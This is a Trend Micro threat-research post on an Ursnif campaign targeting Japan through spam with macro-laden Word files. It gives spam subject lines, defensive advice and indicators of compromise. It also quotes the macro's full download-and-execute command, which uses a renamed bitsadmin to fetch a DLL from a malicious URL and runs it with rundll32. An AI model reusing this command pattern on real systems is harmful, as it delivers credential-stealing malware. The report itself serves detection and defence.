Analysis and insights by Monte De Jesus
Trend Micro researchers detected a new Ursnif campaign targeting users in Japan. The malware is distributed through infected Microsoft Word documents coming from spam emails.
Ursnif, also known as Gozi, is an information stealer that collects login credentials from browsers and email applications. It has capabilities for monitoring network traffic, screen capturing, and keylogging. It is propagated through spam messages or by being downloaded from remote sites by other malware. It can also spread through networks and removable drives.
Details on the new Ursnif campaign
The new Ursnif campaign was detected by Trend Micro researchers through a compromised Word document with the file name info_03_13.doc. The file contains a macro script that creates a copy of bitsadmin.exe, names it curl.com, and executes this command, which includes the malicious URL hxxp://netfletdriold.com/f64bj/jtrhs.php?l=ghs2.cab:
/c c:\windows\temp\curl.com /transfer jobname hxxp://netfletdriold.com/f64bj/jtrhs.php?l=ghs2.cab c:\windows\temp\12345.dll&& rundll32 c:\windows\temp\12345.dll,DllRegisterServer

Figure 1. A sample attachment from an email used to propagate Ursnif
Further investigation using the email attachment hashes led to other email subjects and attachments. The campaign is propagated through spam emails with a variety of topics that are mostly related to business transactions but also include donations and even recreational activities. The attachments are ZIP files that contain the malicious Word documents.
Below are the subjects used for emails with ZIP file attachments named after a company dealing with precision instruments:
- Re: “数値化・測定機能”を強化した、最新マイクロスコープ PMA1969 (Re: The latest microscope with enhanced “quantification / measurement functions” PMA1969)
- Re: 「え?こんなサイズの寸法、測れるの!?」驚きのハンディ三次元測定機 EMA1966 (Re: "Eh, can I measure this size?" Amazing Handy CMM EMA1966)
- Re: 【外観検査】あらゆる欠陥を1度の検査で検出します(Re: [Appearance inspection] All defects are detected in one inspection)
- Re: ポイントサービス規定にご同意いただいていないかたへ (Re: For those who do not agree with the point service rules)
- Re: 見た目そのまま。カタチもそのまま3Dスキャニング PMA1966 (Re: Just look. 3D scanning as it is PMA1966)
Below is the subject used for an email with a ZIP file attachment named after a financial services company (indicated below as “COMPANY NAME”). The email also includes a URL:
- Re: お申込み必須!豪華グルメが盛りだくさん!10月は秋の美食キャンペーン開催決定!【COMPANY NAME】(Re: Application required! Lots of luxury gourmets! In October, a gastronomic campaign for autumn will be held! [COMPANY NAME])
Below are the subjects used for emails with ZIP file attachments named after another company (indicated below as “Company Name”):
- Re: FW: [Company Name] 3AA 通信試験 (Re: FW: [Company Name] 3AA Communication Test)
- Re: RE: [Company Name] 3AA スケジュール (Re: RE: [Company Name] 3AA Schedule)
- Re: リンクアドレスの件及び明日の集合時間 (Re: Link address and tomorrow’s meeting time)
Below are the subjects used for emails with ZIP file attachments named after yet another company. The emails include an embedded link. (“City Name, Prefecture Name” is used below in lieu of the actual names of a city and prefecture):
- Re: 【新作資料】新しい外観検査手法をご提案!3つの撮像モードで圧倒的な対応力(Re: [New material] Propose a new appearance inspection method! Overwhelming responsiveness in three imaging modes)
- Re: 【City Name, Prefecture Name】ふるさと応援寄付お申し込みを頂きまして有難うございます(Re: [City Name, Prefecture Name] Thank you for applying for hometown support donation)
- Re: センサメーカーが作った『センサの教科書』(Re: “Sensor textbook” created by sensor manufacturers)
- Re: 精度を上げて、管理工数を下げる!測定・検査改善事例 (Re: Increase accuracy and reduce man-hours! Measurement and inspection improvement examples)
Thwarting the Ursnif malware
By following simple security guidelines, enterprises and users can thwart Ursnif before it gets the chance to sniff out valuable information. One way to promote these guidelines is holding office trainings on the
best practices for email-based threats. As a basic rule, employees should carefully inspect emails and URLs, and should not download attachments and click links from unknown sources.
The
Trend Micro™ Deep Discovery™ Inspector solution uses custom sandboxing for isolating and analyzing potentially malicious components without compromising the entire network. It proactively detects the command-and-server connection for Ursnif with this rule:
- DDI Rule: URSNIF - HTTP (Request) - Variant 3
Indicators of compromise
Documents
SHA-256 |
Trend Micro Pattern Detection |
2b7d0241afe2ed602ee53c29e7ffd065f0237dd1978a29b1661f07ebc6d3daab |
Trojan.W97M.BITSLODR.AG |
fcec8b93bd63c41643a43baa0529beeabe4427e0cab169a13f229e2e7c1c5929 |
Trojan.W97M.BITSLODR.AG |
608c4b594423b49ff2fc40f5abcceb6ecb465948aab0edcb39fb34a229591fa7
|
Trojan.W97M.DLOADR.TIOIBEJX |
0023570437222a063bd50620237da35b8d2877a2c8f2d3507231337233a47813 |
Trojan.W97M.DLOADR.TIOIBEJX |
94b00ef899ac314cd255ed557a743d1b5d56ef28306d7f1794b80741984486e6 |
Trojan.W97M.DONOFF.ND |
9a8de0d3524fb0c3969672eb3ed2f1b4ed9b79718ace30e7a8e6a9d73104e3fe |
Trojan.W97M.OLEGTAD.AC |
Binary
SHA-256 |
Trend Micro Pattern Detection |
5aa1a83ae2dee31a061c91afa9f5a6c25cfd4c65a5ba01bdf674d08aecad4f6d |
TrojanSpy.Win32.URSNIF.TIABOEEG |
URL
- hxxp://netfletdriold.com/f64bj/jtrhs.php?l=ghs2.cab
HIDE
Like it? Add this infographic to your site:
1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V).
Image will appear the same size as you see above.